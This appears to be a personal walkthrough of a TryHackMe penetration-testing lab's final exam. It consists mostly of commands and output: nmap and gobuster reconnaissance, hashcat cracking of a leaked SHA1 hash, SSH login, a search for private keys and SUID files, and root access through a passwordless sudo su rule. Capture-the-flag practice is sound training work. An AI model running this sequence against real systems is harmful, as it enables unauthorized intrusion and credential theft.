https://tryhackme.com/room/ccpentesting

Final Exam

nmap

http://10.10.153.136/ → Apache2 Ubuntu Default Page

$ nmap 10.10.153.136
22/tcp open  ssh
80/tcp open  http

$ nmap 10.10.153.136 -p22,80 -A -v
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 12:96:a6:1e:81:73:ae:17:4c:e1:7c:63:78:3c:71:1c (RSA)
|   256 6d:9c:f2:07:11:d2:aa:19:99:90:bb:ec:6b:a1:53:77 (ECDSA)
|_  256 0e:a5:fa:ce:f2:ad:e6:fa:99:f3:92:5f:87:bb:ba:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

gobuster

$ gobuster dir -u 10.10.153.136 -w /usr/share/wordlists/dirb/common.txt
/secret (Status: 301)

http://10.10.153.136/secret/ → blank :(

$ gobuster dir -u 10.10.153.136/secret -w /usr/share/wordlists/dirb/common.txt -x txt,php,pdf
/secret.txt (Status: 200)

http://10.10.153.136/secret/secret.txt → nyan:046385855FC9580393853D8E81F240B66FE9A7B8

hashcat

40 bits → SHA1?

hashcat -a0 -m100 hash rockyou.txt
046385855fc9580393853d8e81f240b66fe9a7b8:nyan

ssh

$ ssh [email protected] exit
[email protected]'s password: nyan
nyan@ubuntu:~$ cat user.txt

privesc

nyan@ubuntu:~$ find / -name id_rsa 2> /dev/null
# nothing

nyan@ubuntu:~$ find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \\;
# nothing useful?

nyan@ubuntu:~$ crontab -l
no crontab for nyan

nyan@ubuntu:~$ sudo -l
User nyan may run the following commands on ubuntu:
    (root) NOPASSWD: /bin/su

nyan@ubuntu:~$ sudo su
root@ubuntu:/home/nyan# cat /root/root.txt 

other findings

nikto